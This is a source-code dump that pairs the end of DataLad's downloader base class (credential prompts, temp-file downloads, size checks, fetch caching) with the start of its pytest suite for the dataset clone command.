\"\n \"Adjust your configuration for the provider.%s\"\n % (url, msg_types))\n else:\n # how could be None or any other non-False bool(False)\n assert (needs_authentication is None)\n # So we didn't know if authentication necessary, and it\n # seems to be necessary, so Let's ask the user to setup\n # authentication mechanism for this website\n self._enter_credentials(\n url,\n denied_msg=access_denied,\n auth_types=supported_auth_types,\n new_provider=True)\n\n def _setup_new_provider(self, title, url, auth_types=None):\n # Full new provider (TODO move into Providers?)\n from .providers import Providers\n providers = Providers.from_config_files()\n while True:\n provider = providers.enter_new(url, auth_types=auth_types)\n if not provider:\n if ui.yesno(\n title=\"Re-enter provider?\",\n text=\"You haven't entered or saved provider, would you like to retry?\",\n default=True\n ):\n continue\n break\n return provider\n\n def _enter_credentials(\n self, url, denied_msg,\n auth_types=[], new_provider=True):\n \"\"\"Use when authentication fails to set new credentials for url\n\n Raises\n ------\n DownloadError\n If no known credentials type or user refuses to update\n \"\"\"\n title = f\"{denied_msg} to {url} has failed.\"\n\n if new_provider:\n # No credential was known, we need to create an\n # appropriate one\n if not ui.yesno(\n title=title,\n text=\"Would you like to setup a new provider configuration\"\n \" to access url?\",\n default=True\n ):\n assert not self.authenticator, \"bug: incorrect assumption\"\n raise DownloadError(\n title +\n \" No authenticator is known, cannot set any credential\")\n else:\n provider = self._setup_new_provider(\n title, url, auth_types=auth_types)\n self.authenticator = provider.authenticator\n self.credential = provider.credential\n if not (self.credential and self.credential.is_known):\n # TODO: or should we ask to re-enter?\n self.credential.enter_new()\n else:\n action_msg = \"enter other credentials in case they were updated?\"\n\n if self.credential and ui.yesno(\n title=title,\n text=\"Do you want to %s\" % action_msg):\n self.credential.enter_new()\n else:\n raise DownloadError(\n \"Failed to download from %s given available credentials\"\n % url)\n\n lgr.debug(\"set credential context as %s\", url)\n self.credential.set_context(auth_url=url)\n\n @staticmethod\n def _get_temp_download_filename(filepath):\n \"\"\"Given a filepath, return the one to use as temp file during download\n \"\"\"\n # TODO: might better reside somewhere under .datalad/tmp or\n # .git/datalad/tmp\n return filepath + \".datalad-download-temp\"\n\n @abstractmethod\n def get_downloader_session(self, url):\n \"\"\"\n\n Parameters\n ----------\n url : str\n\n Returns\n -------\n downloader_into_fp: callable\n Which takes two parameters: file, pbar\n target_size: int or None (if unknown)\n url: str\n Possibly redirected url\n url_filename: str or None\n Filename as decided from the (redirected) url\n headers : dict or None\n \"\"\"\n raise NotImplementedError(\"Must be implemented in the subclass\")\n\n def _verify_download(self, url, downloaded_size, target_size, file_=None, content=None):\n \"\"\"Verify that download finished correctly\"\"\"\n\n if (self.authenticator\n and downloaded_size < self._DOWNLOAD_SIZE_TO_VERIFY_AUTH) \\\n and hasattr(self.authenticator, 'failure_re') \\\n and self.authenticator.failure_re:\n assert hasattr(self.authenticator, 'check_for_auth_failure'), \\\n \"%s has failure_re defined but no check_for_auth_failure\" \\\n % self.authenticator\n\n if 
file_:\n # just read bytes and pass to check_for_auth_failure which\n # will then encode regex into bytes (assuming utf-8 though)\n with open(file_, 'rb') as fp:\n content = fp.read(self._DOWNLOAD_SIZE_TO_VERIFY_AUTH)\n else:\n assert(content is not None)\n\n self.authenticator.check_for_auth_failure(\n content, \"Download of the url %s has failed: \" % url)\n\n if target_size and target_size != downloaded_size:\n raise (IncompleteDownloadError if target_size > downloaded_size else UnaccountedDownloadError)(\n \"Downloaded size %d differs from originally announced %d\" % (downloaded_size, target_size))\n\n def _download(self, url, path=None, overwrite=False, size=None, stats=None):\n \"\"\"Download content into a file\n\n Parameters\n ----------\n url: str\n URL to download\n path: str, optional\n Path to file where to store the downloaded content. If None,\n filename deduced from the url and saved in curdir\n size: int, optional\n Limit in size to be downloaded\n\n Returns\n -------\n None or string\n Returns downloaded filename\n\n \"\"\"\n\n downloader_session = self.get_downloader_session(url)\n status = self.get_status_from_headers(downloader_session.headers)\n\n target_size = downloader_session.size\n if size is not None:\n target_size = min(target_size, size)\n\n #### Specific to download\n if path:\n download_dir = op.dirname(path)\n if download_dir:\n os.makedirs(download_dir, exist_ok=True)\n if isdir(path):\n # provided path is a directory under which to save\n filename = downloader_session.filename\n if not filename:\n raise DownloadError(\n \"File name could not be determined from {}\".format(url))\n filepath = opj(path, filename)\n else:\n filepath = path\n else:\n filepath = downloader_session.filename\n\n existed = op.lexists(filepath)\n if existed and not overwrite:\n raise DownloadError(\"Path %s already exists\" % filepath)\n\n # FETCH CONTENT\n # TODO: pbar = ui.get_progressbar(size=response.headers['size'])\n try:\n temp_filepath = self._get_temp_download_filename(filepath)\n if exists(temp_filepath):\n # eventually we might want to continue the download\n lgr.warning(\n \"Temporary file %s from the previous download was found. \"\n \"It will be overridden\" % temp_filepath)\n # TODO. 
also logic below would clean it up atm\n\n with open(temp_filepath, 'wb') as fp:\n # TODO: url might be a bit too long for the beast.\n # Consider to improve to make it animated as well, or shorten here\n pbar = ui.get_progressbar(label=url, fill_text=filepath, total=target_size)\n t0 = time.time()\n downloader_session.download(fp, pbar, size=size)\n downloaded_time = time.time() - t0\n pbar.finish()\n downloaded_size = os.stat(temp_filepath).st_size\n\n # (headers.get('Content-type', \"\") and headers.get('Content-Type')).startswith('text/html')\n # and self.authenticator.html_form_failure_re: # TODO: use information in authenticator\n self._verify_download(url, downloaded_size, target_size, temp_filepath)\n\n # adjust atime/mtime according to headers/status\n if status.mtime:\n lgr.log(5, \"Setting mtime for %s to be %s\", temp_filepath, status.mtime)\n os.utime(temp_filepath, (time.time(), status.mtime))\n\n # place successfully downloaded over the filepath\n os.replace(temp_filepath, filepath)\n\n if stats:\n stats.downloaded += 1\n stats.overwritten += int(existed)\n stats.downloaded_size += downloaded_size\n stats.downloaded_time += downloaded_time\n except (AccessDeniedError, IncompleteDownloadError) as e:\n raise\n except Exception as e:\n ce = CapturedException(e)\n lgr.error(\"Failed to download %s into %s: %s\", url, filepath, ce)\n raise DownloadError(ce) from e # for now\n finally:\n if exists(temp_filepath):\n # clean up\n lgr.debug(\"Removing a temporary download %s\", temp_filepath)\n unlink(temp_filepath)\n\n return filepath\n\n def download(self, url, path=None, **kwargs):\n \"\"\"Fetch content as pointed by the URL optionally into a file\n\n Parameters\n ----------\n url : string\n URL to access\n path : string, optional\n Filename or existing directory to store downloaded content under.\n If not provided -- deduced from the url\n\n Returns\n -------\n string\n file path\n \"\"\"\n # TODO: may be move all the path dealing logic here\n # but then it might require sending request anyways for Content-Disposition\n # so probably nah\n lgr.info(\"Downloading %r into %r\", url, path)\n return self.access(self._download, url, path=path, **kwargs)\n\n @property\n def cache(self):\n if self._cache is None:\n # TODO: move this all logic outside into a dedicated caching beast\n lgr.info(\"Initializing cache for fetches\")\n import dbm\n # Initiate cache.\n # Very rudimentary caching for now, might fail many ways\n cache_dir = cfg.obtain('datalad.locations.cache')\n if not exists(cache_dir):\n os.makedirs(cache_dir)\n cache_path = opj(cache_dir, 'crawl_cache.dbm')\n self._cache = dbm.open(cache_path, 'c')\n import atexit\n atexit.register(self._cache.close)\n return self._cache\n\n def _fetch(self, url, cache=None, size=None, allow_redirects=True, decode=True):\n \"\"\"Fetch content from a url into a file.\n\n Very similar to _download but lacks any \"file\" management and decodes\n content\n\n Parameters\n ----------\n url: str\n URL to download\n cache: bool, optional\n If None, config is consulted to determine whether results should be\n cached. 
Cache is operating based on url, so no verification of any\n kind is carried out\n\n Returns\n -------\n bytes, dict\n content, headers\n \"\"\"\n lgr.log(3, \"_fetch(%r, cache=%r, size=%r, allow_redirects=%r)\",\n url, cache, size, allow_redirects)\n if cache is None:\n cache = cfg.obtain('datalad.crawl.cache', default=False)\n\n if cache:\n cache_key = msgpack.dumps(url)\n lgr.debug(\"Loading content for url %s from cache\", url)\n res = self.cache.get(cache_key)\n if res is not None:\n try:\n return msgpack.loads(res, encoding='utf-8')\n except Exception as exc:\n ce = CapturedException(exc)\n lgr.warning(\"Failed to unpack loaded from cache for %s: %s\",\n url, ce)\n\n downloader_session = self.get_downloader_session(url, allow_redirects=allow_redirects)\n\n target_size = downloader_session.size\n if size is not None:\n if size == 0:\n # no download of the content was requested -- just return headers and be done\n return None, downloader_session.headers\n target_size = min(size, target_size)\n\n # FETCH CONTENT\n try:\n # Consider to improve to make it animated as well, or shorten here\n #pbar = ui.get_progressbar(label=url, fill_text=filepath, total=target_size)\n content = downloader_session.download(size=size)\n #pbar.finish()\n downloaded_size = len(content)\n\n # now that we know size based on encoded content, let's decode into string type\n if isinstance(content, bytes) and decode:\n content = ensure_unicode(content)\n # downloaded_size = os.stat(temp_filepath).st_size\n\n self._verify_download(url, downloaded_size, target_size, None, content=content)\n\n except (AccessDeniedError, IncompleteDownloadError) as e:\n raise\n except Exception as e:\n ce = CapturedException(e)\n lgr.error(\"Failed to fetch %s: %s\", url, ce)\n raise DownloadError(ce) from e # for now\n\n if cache:\n # apparently requests' CaseInsensitiveDict is not serialazable\n # TODO: may be we should reuse that type everywhere, to avoid\n # out own handling for case-handling\n self.cache[cache_key] = msgpack.dumps((content, dict(downloader_session.headers)))\n\n return content, downloader_session.headers\n\n def fetch(self, url, **kwargs):\n \"\"\"Fetch and return content (not decoded) as pointed by the URL\n\n Parameters\n ----------\n url : string\n URL to access\n\n Returns\n -------\n bytes\n content\n \"\"\"\n lgr.debug(\"Fetching %r\", url)\n # Do not return headers, just content\n out = self.access(self._fetch, url, **kwargs)\n return out[0]\n\n def get_status(self, url, old_status=None, **kwargs):\n \"\"\"Return status of the url as a dict, None if N/A\n\n Parameters\n ----------\n url : string\n URL to access\n old_status : FileStatus, optional\n Previous status record. If provided, might serve as a shortcut\n to assess if status has changed, and if not -- return the same\n record\n\n Returns\n -------\n dict\n dict-like beast depicting the status of the URL if accessible.\n Returned value should be sufficient to tell if the URL content\n has changed by comparing to previously obtained value.\n If URL is not reachable, None would be returned\n \"\"\"\n return self.access(self._get_status, url, old_status=old_status, **kwargs)\n\n # TODO: borrow from itself... 
?\n # @borrowkwargs(BaseDownloader, 'get_status')\n def _get_status(self, url, old_status=None):\n\n # the tricky part is only to make sure that we are getting the target URL\n # and not some page saying to login, that is why we need to fetch some content\n # in those cases, and not just check the headers\n download_size = self._DOWNLOAD_SIZE_TO_VERIFY_AUTH \\\n if self.authenticator \\\n and hasattr(self.authenticator, 'failure_re') \\\n and self.authenticator.failure_re \\\n else 0\n\n _, headers = self._fetch(url, cache=False, size=download_size, decode=False)\n\n # extract from headers information to depict the status of the url\n status = self.get_status_from_headers(headers)\n\n if old_status is not None:\n raise NotImplementedError(\"Do not know yet how to deal with old_status. TODO\")\n\n return status\n\n @classmethod\n @abstractmethod\n def get_status_from_headers(cls, headers):\n raise NotImplementedError(\"Implement in the subclass: %s\" % cls)\n\n def get_target_url(self, url):\n \"\"\"Return url after possible redirections\n\n Parameters\n ----------\n url : string\n URL to access\n\n Returns\n -------\n str\n \"\"\"\n return self.access(self._get_target_url, url)\n\n def _get_target_url(self, url):\n return self.get_downloader_session(url).url\n\n\n#\n# Authenticators XXX might go into authenticators.py\n#\n\nclass Authenticator(object):\n \"\"\"Abstract common class for different types of authentication\n\n Derived classes should get parameterized with options from the config files\n from \"provider:\" sections\n \"\"\"\n requires_authentication = True\n allows_anonymous = False\n # TODO: figure out interface\n\n DEFAULT_CREDENTIAL_TYPE = 'user_password'\n\n def authenticate(self, *args, **kwargs):\n \"\"\"Derived classes will provide specific implementation\n \"\"\"\n if self.requires_authentication:\n raise NotImplementedError(\"Authentication for %s not yet implemented\" % self.__class__)\n\n\nclass NotImplementedAuthenticator(Authenticator):\n pass\n\n\nclass NoneAuthenticator(Authenticator):\n \"\"\"Whenever no authentication is necessary and that is stated explicitly\"\"\"\n requires_authentication = False\n pass\n" }, { "alpha_fraction": 0.6045682430267334, "alphanum_fraction": 0.6107990741729736, "avg_line_length": 37.08613967895508, "blob_id": "889c0151f82f691c705038646d99e1766c3eb7b8", "content_id": "d5fd1b7efedd3cff9d7ae192cd432c5cee2144c9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 66765, "license_type": "permissive", "max_line_length": 96, "num_lines": 1753, "path": "/datalad/core/distributed/tests/test_clone.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test clone action\n\n\"\"\"\n\nimport logging\nimport os.path as op\nimport stat\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import consts\nfrom datalad.api import (\n clone,\n create,\n remove,\n)\nfrom datalad.cmd import GitWitlessRunner\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.config import ConfigManager\nfrom datalad.core.distributed.clone_utils import (\n _get_installationpath_from_url,\n decode_source_spec,\n)\nfrom datalad.distribution.dataset 
import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import IncompleteResultsError\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_false,\n assert_in,\n assert_in_results,\n assert_message,\n assert_not_in,\n assert_not_is_instance,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_result_values_equal,\n assert_status,\n create_tree,\n eq_,\n get_datasets_topdir,\n has_symlink_capability,\n integration,\n known_failure,\n known_failure_githubci_win,\n known_failure_osx,\n known_failure_windows,\n neq_,\n nok_,\n ok_,\n ok_file_has_content,\n ok_startswith,\n on_travis,\n patch_config,\n serve_path_via_http,\n set_date,\n skip_if,\n skip_if_adjusted_branch,\n skip_if_no_network,\n skip_if_on_windows,\n skip_ssh,\n slow,\n swallow_logs,\n with_sameas_remote,\n with_tempfile,\n with_tree,\n xfail_buggy_annex_info,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n get_home_envvars,\n on_windows,\n rmtree,\n)\n\n# this is the dataset ID of our test dataset in the main datalad RIA store\ndatalad_store_testds_id = '76b6ca66-36b1-11ea-a2e6-f0d5bf7b5561'\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_invalid_args(path=None, otherpath=None, alienpath=None):\n # source == path\n assert_raises(ValueError, clone, 'Zoidberg', path='Zoidberg')\n assert_raises(ValueError, clone, 'ssh://mars/Zoidberg', path='ssh://mars/Zoidberg')\n\n # \"invalid URL\" is a valid filepath... and since no clone to remote\n # is possible - we can just assume that it is the (legit) file path\n # which is provided, not a URL. So both below should fail as any\n # other clone from a non-existing source and not for the reason of\n # \"invalid something\". 
Behavior is similar to how Git performs - can\n # clone into a URL-like path.\n\n # install to an \"invalid URL\" path\n res = clone('Zoidberg', path='ssh://mars:Zoidberg', on_failure='ignore',\n result_xfm=None)\n assert_status('error', res)\n\n # install to a \"remote location\" path\n res = clone('Zoidberg', path='ssh://mars/Zoidberg', on_failure='ignore',\n result_xfm=None)\n assert_status('error', res)\n\n # make fake dataset\n ds = create(path)\n assert_raises(IncompleteResultsError, ds.clone, '/higherup.', 'Zoidberg')\n # make real dataset, try to install outside\n ds_target = create(Path(otherpath) / 'target')\n assert_raises(ValueError, ds_target.clone, ds.path, path=ds.path)\n assert_status('error', ds_target.clone(ds.path, path=alienpath,\n on_failure='ignore', result_xfm=None))\n\n\n@integration\n@skip_if_no_network\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_clone_crcns(tdir=None, ds_path=None):\n with chpwd(tdir):\n res = clone('///', path=\"all-nonrecursive\", on_failure='ignore',\n result_xfm=None, return_type='list')\n assert_status('ok', res)\n\n # again, but into existing dataset:\n ds = create(ds_path)\n crcns = ds.clone(\"///crcns\", result_xfm='datasets', return_type='item-or-list')\n ok_(crcns.is_installed())\n eq_(crcns.pathobj, ds.pathobj / \"crcns\")\n assert_in(crcns.path, ds.subdatasets(result_xfm='paths'))\n\n\n@integration\n@skip_if_no_network\n@with_tree(tree={'sub': {}})\ndef test_clone_datasets_root(tdir=None):\n tdir = Path(tdir)\n with chpwd(tdir):\n ds = clone(\"///\")\n ok_(ds.is_installed())\n eq_(ds.pathobj, tdir / get_datasets_topdir())\n\n # do it a second time:\n res = clone(\"///\", on_failure='ignore', result_xfm=None, return_type='list')\n assert_message(\n \"dataset %s was already cloned from '%s'\",\n res)\n assert_status('notneeded', res)\n\n # and a third time into an existing something, that is not a dataset:\n (tdir / 'sub' / 'a_file.txt').write_text(\"something\")\n\n res = clone('///', path=\"sub\", on_failure='ignore', result_xfm=None)\n assert_message(\n 'target path already exists and not empty, refuse to clone into target path',\n res)\n assert_status('error', res)\n\n\n@with_tempfile(mkdir=True)\ndef check_clone_simple_local(src, path):\n origin = Dataset(path)\n\n # now install it somewhere else\n ds = clone(src, path, description='mydummy',\n result_xfm='datasets', return_type='item-or-list')\n eq_(ds.path, path)\n ok_(ds.is_installed())\n if not isinstance(origin.repo, AnnexRepo):\n # this means it is a GitRepo\n ok_(isinstance(origin.repo, GitRepo))\n # stays plain Git repo\n ok_(isinstance(ds.repo, GitRepo))\n ok_(not isinstance(ds.repo, AnnexRepo))\n ok_(GitRepo.is_valid_repo(ds.path))\n eq_(set(ds.repo.get_indexed_files()),\n {'test.dat', 'INFO.txt', '.noannex',\n str(Path('.datalad', 'config'))})\n assert_repo_status(path, annex=False)\n else:\n # must be an annex\n ok_(isinstance(ds.repo, AnnexRepo))\n ok_(AnnexRepo.is_valid_repo(ds.path, allow_noninitialized=False))\n eq_(set(ds.repo.get_indexed_files()),\n {'test.dat',\n 'INFO.txt',\n 'test-annex.dat',\n str(Path('.datalad', 'config')),\n str(Path('.datalad', '.gitattributes')),\n '.gitattributes'})\n assert_repo_status(path, annex=True)\n # no content was installed:\n ok_(not ds.repo.file_has_content('test-annex.dat'))\n uuid_before = ds.repo.uuid\n ok_(uuid_before) # make sure we actually have an uuid\n eq_(ds.repo.get_description(), 'mydummy')\n\n # installing it again, shouldn't matter:\n res = clone(src, path, result_xfm=None, 
return_type='list')\n assert_result_values_equal(res, 'source_url', [src])\n assert_status('notneeded', res)\n assert_message(\"dataset %s was already cloned from '%s'\", res)\n ok_(ds.is_installed())\n if isinstance(origin.repo, AnnexRepo):\n eq_(uuid_before, ds.repo.uuid)\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_clone_simple_local(src=None, url=None):\n srcobj = Path(src)\n gitds = Dataset(srcobj / 'git').create(annex=False)\n annexds = Dataset(srcobj/ 'annex').create(annex=True)\n (annexds.pathobj / \"test-annex.dat\").write_text('annexed content')\n annexds.save()\n for ds in (gitds, annexds):\n (ds.pathobj / 'test.dat').write_text('content')\n (ds.pathobj / 'INFO.txt').write_text('content2')\n ds.save(to_git=True)\n ds.repo.call_git([\"update-server-info\"])\n check_clone_simple_local(gitds.path)\n check_clone_simple_local(gitds.pathobj)\n check_clone_simple_local(f'{url}git')\n check_clone_simple_local(annexds.path)\n check_clone_simple_local(annexds.pathobj)\n check_clone_simple_local(f'{url}annex')\n\n\n@with_tempfile\ndef check_clone_dataset_from_just_source(url, path):\n with chpwd(path, mkdir=True):\n ds = clone(url, result_xfm='datasets', return_type='item-or-list')\n\n ok_startswith(ds.path, path)\n ok_(ds.is_installed())\n ok_(GitRepo.is_valid_repo(ds.path))\n assert_repo_status(ds.path, annex=None)\n assert_in('INFO.txt', ds.repo.get_indexed_files())\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_clone_dataset_from_just_source(src=None, url=None):\n ds = Dataset(src).create()\n (ds.pathobj / 'INFO.txt').write_text('content')\n ds.save()\n ds.repo.call_git([\"update-server-info\"])\n check_clone_dataset_from_just_source(ds.path)\n check_clone_dataset_from_just_source(ds.pathobj)\n check_clone_dataset_from_just_source(url)\n\n\n# test fails randomly, likely a bug in one of the employed test helpers\n# https://github.com/datalad/datalad/pull/3966#issuecomment-571267932\n@known_failure\n@with_tree(tree={\n 'ds': {'test.txt': 'some'},\n })\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_clone_dataladri(src=None, topurl=None, path=None):\n # make plain git repo\n ds_path = Path(src) / 'ds'\n gr = GitRepo(ds_path, create=True)\n gr.add('test.txt')\n gr.commit('demo')\n Runner(cwd=gr.path).run(['git', 'update-server-info'])\n # now install it somewhere else\n with patch('datalad.consts.DATASETS_TOPURL', topurl):\n ds = clone('///ds', path, result_xfm='datasets', return_type='item-or-list')\n eq_(ds.path, path)\n assert_repo_status(path, annex=False)\n ok_file_has_content(ds.pathobj / 'test.txt', 'some')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_clone_isnot_recursive(path_src=None, path_nr=None, path_r=None):\n src = Dataset(path_src).create()\n src.create('subm 1')\n src.create('2')\n\n ds = clone(src, path_nr, result_xfm='datasets', return_type='item-or-list')\n ok_(ds.is_installed())\n # check nothing is unintentionally installed\n subdss = ds.subdatasets(recursive=True)\n assert_result_count(subdss, len(subdss), state='absent')\n # this also means, subdatasets to be listed as absent:\n eq_(set(ds.subdatasets(recursive=True, state='absent', result_xfm='relpaths')),\n {'subm 1', '2'})\n\n\n@skip_if(on_travis) # xfails -- stalls, https://github.com/datalad/datalad/issues/6845\n@with_tempfile\n@with_tempfile\ndef test_clone_into_dataset(source_path=None, top_path=None):\n source = Dataset(source_path).create()\n ds = create(top_path)\n assert_repo_status(ds.path)\n # Note, we 
test against the produced history in DEFAULT_BRANCH, not what it\n # turns into in an adjusted branch!\n hexsha_before = ds.repo.get_hexsha(DEFAULT_BRANCH)\n subds = ds.clone(source, \"sub\",\n result_xfm='datasets', return_type='item-or-list')\n ok_((subds.pathobj / '.git').is_dir())\n ok_(subds.is_installed())\n assert_in('sub', ds.subdatasets(state='present', result_xfm='relpaths'))\n # sub is clean:\n assert_repo_status(subds.path, annex=None)\n # top is clean:\n assert_repo_status(ds.path, annex=None)\n # source is recorded in .gitmodules:\n sds = ds.subdatasets(\"sub\")\n assert_result_count(sds, 1, action='subdataset')\n eq_(sds[0]['gitmodule_datalad-url'], source.pathobj.as_posix())\n # Clone produced one commit including the addition to .gitmodule:\n commits = list(ds.repo.get_branch_commits_(\n branch=DEFAULT_BRANCH,\n stop=hexsha_before\n ))\n assert_not_in(hexsha_before, commits)\n eq_(len(commits), 1)\n\n # but we could also save while installing and there should be no side-effect\n # of saving any other changes if we state to not auto-save changes\n # Create a dummy change\n create_tree(ds.path, {'dummy.txt': 'buga'})\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n subds_ = ds.clone(source, \"sub2\",\n result_xfm='datasets', return_type='item-or-list')\n eq_(subds_.pathobj, ds.pathobj / \"sub2\") # for paranoid yoh ;)\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n\n # don't do anything to the dataset, when cloning fails (gh-6138)\n create_tree(ds.path, {'subdir': {'dummy2.txt': 'whatever'}})\n assert_repo_status(ds.path,\n untracked=[str(ds.pathobj / 'subdir'),\n 'dummy.txt'])\n hexsha_before = ds.repo.get_hexsha(DEFAULT_BRANCH)\n results = ds.clone(source, \"subdir\",\n result_xfm=None,\n return_type='list',\n on_failure='ignore')\n assert_in_results(results, status='error')\n # status unchanged\n assert_repo_status(ds.path,\n untracked=[str(ds.pathobj / 'subdir'),\n 'dummy.txt'])\n # nothing was committed\n eq_(hexsha_before, ds.repo.get_hexsha(DEFAULT_BRANCH))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_notclone_known_subdataset(src_path=None, path=None):\n src = Dataset(src_path).create()\n sub = src.create('subm 1')\n sub_id = sub.id\n # get the superdataset:\n ds = clone(src, path,\n result_xfm='datasets', return_type='item-or-list')\n\n # subdataset not installed:\n subds = Dataset(ds.pathobj / 'subm 1')\n assert_false(subds.is_installed())\n assert_in('subm 1', ds.subdatasets(state='absent', result_xfm='relpaths'))\n assert_not_in('subm 1', ds.subdatasets(state='present', result_xfm='relpaths'))\n # clone is not meaningful\n res = ds.clone('subm 1', on_failure='ignore', result_xfm=None)\n assert_status('error', res)\n assert_message(\"Failed to clone from any candidate source URL. 
\"\n \"Encountered errors per each url were:\\n- %s\",\n res)\n # get does the job\n res = ds.get(path='subm 1', get_data=False)\n assert_status('ok', res)\n ok_(subds.is_installed())\n ok_(AnnexRepo.is_valid_repo(subds.path, allow_noninitialized=False))\n # Verify that it is the correct submodule installed and not\n # new repository initiated\n eq_(subds.id, sub_id)\n assert_not_in('subm 1', ds.subdatasets(state='absent', result_xfm='relpaths'))\n assert_in('subm 1', ds.subdatasets(state='present', result_xfm='relpaths'))\n\n\n@with_tempfile(mkdir=True)\ndef test_failed_clone(dspath=None):\n ds = create(dspath)\n res = ds.clone(\"http://nonexistingreallyanything.datalad.org/bla\", \"sub\",\n on_failure='ignore', result_xfm=None)\n assert_status('error', res)\n assert_message(\"Failed to clone from any candidate source URL. \"\n \"Encountered errors per each url were:\\n- %s\",\n res)\n\n\n@with_tree(tree={\n 'ds': {'test.txt': 'some'},\n })\n@with_tempfile\ndef test_clone_missing_commit(source=None, clone=None):\n\n from datalad.core.distributed.clone import clone_dataset\n\n source = Path(source)\n clone = Path(clone)\n\n # Commit SHA from another repository - should never be recreated in a fresh\n # dataset:\n commit_sha = \"c29691b37b05b78ffa76e5fdf0044e9df673e8f1\"\n\n origin = Dataset(source).create(force=True)\n origin.save()\n\n # clone origin but request commit_sha to be checked out:\n\n results = [x for x in\n clone_dataset(srcs=[source], destds=Dataset(clone),\n checkout_gitsha=commit_sha)\n ]\n # expected error result:\n assert_result_count(results, 1)\n assert_in_results(results, status='error', action='install',\n path=str(clone), type='dataset')\n assert_in(\"Target commit c29691b3 does not exist in the clone\",\n results[0]['message'])\n # failed attempt was removed:\n assert_false(clone.exists())\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef check_reckless(annex, src_path, top_path, sharedpath):\n # super with or without annex\n src = Dataset(src_path).create(annex=annex)\n # sub always with annex\n srcsub = src.create('sub')\n\n # and for the actual test\n ds = clone(src.path, top_path, reckless=True,\n result_xfm='datasets', return_type='item-or-list')\n\n is_crippled = srcsub.repo.is_managed_branch()\n\n if annex and not is_crippled:\n eq_(ds.config.get('annex.hardlink', None), 'true')\n\n # actual value is 'auto', because True is a legacy value and we map it\n eq_(ds.config.get('datalad.clone.reckless', None), 'auto')\n if annex:\n eq_(ds.repo.repo_info()['untrusted repositories'][0]['here'], True)\n # now, if we clone another repo into this one, it will inherit the setting\n # without having to provide it explicitly\n newsub = ds.clone(srcsub, 'newsub', result_xfm='datasets', return_type='item-or-list')\n # and `get` the original subdataset\n origsub = ds.get('sub', result_xfm='datasets', return_type='item-or-list')\n for sds in (newsub, origsub):\n eq_(sds.config.get('datalad.clone.reckless', None), 'auto')\n if not is_crippled:\n eq_(sds.config.get('annex.hardlink', None), 'true')\n\n if is_crippled:\n raise SkipTest(\"Remainder of test needs proper filesystem permissions\")\n\n if annex:\n if ds.repo.git_annex_version < \"8.20200908\":\n # TODO: Drop when GIT_ANNEX_MIN_VERSION is at least 8.20200908.\n\n # the standard setup keeps the annex locks accessible to the user only\n nok_((ds.pathobj / '.git' / 'annex' / 'index.lck').stat().st_mode \\\n & stat.S_IWGRP)\n else:\n # umask might be such (e.g. 
002) that group write permissions are inherited, so\n # for the next test we should check if that is the case on some sample file\n dltmp_path = ds.pathobj / '.git' / \"dltmp\"\n dltmp_path.write_text('')\n default_grp_write_perms = dltmp_path.stat().st_mode & stat.S_IWGRP\n dltmp_path.unlink()\n # the standard setup keeps the annex locks following umask inheritance\n eq_((ds.pathobj / '.git' / 'annex' / 'index.lck').stat().st_mode \\\n & stat.S_IWGRP, default_grp_write_perms)\n\n # but we can set it up for group-shared access too\n sharedds = clone(\n src, sharedpath,\n reckless='shared-group',\n result_xfm='datasets',\n return_type='item-or-list')\n ok_((sharedds.pathobj / '.git' / 'annex' / 'index.lck').stat().st_mode \\\n & stat.S_IWGRP)\n\n\[email protected]('reckless', [True, False])\ndef test_reckless(reckless):\n check_reckless(reckless)\n\n\n@with_tempfile\n@with_tempfile\ndef test_install_source_relpath(src=None, dest=None):\n src = Path(src)\n create(src)\n src_ = src.name\n with chpwd(src.parent):\n clone(src_, dest)\n\n\n@with_tempfile\n@with_tempfile\ndef test_clone_isnt_a_smartass(origin_path=None, path=None):\n origin = create(origin_path)\n cloned = clone(origin, path,\n result_xfm='datasets', return_type='item-or-list')\n with chpwd(path):\n # no were are inside a dataset clone, and we make another one\n # we do not want automatic subdatasetification without given a dataset\n # explicitly\n clonedsub = clone(origin, 'testsub',\n result_xfm='datasets', return_type='item-or-list')\n # correct destination\n assert clonedsub.path.startswith(path)\n # no subdataset relation\n eq_(cloned.subdatasets(), [])\n\n\n@with_tempfile(mkdir=True)\ndef test_clone_report_permission_issue(tdir=None):\n pdir = Path(tdir) / 'protected'\n pdir.mkdir()\n # make it read-only\n pdir.chmod(0o555)\n with chpwd(pdir):\n # first check the premise of the test. 
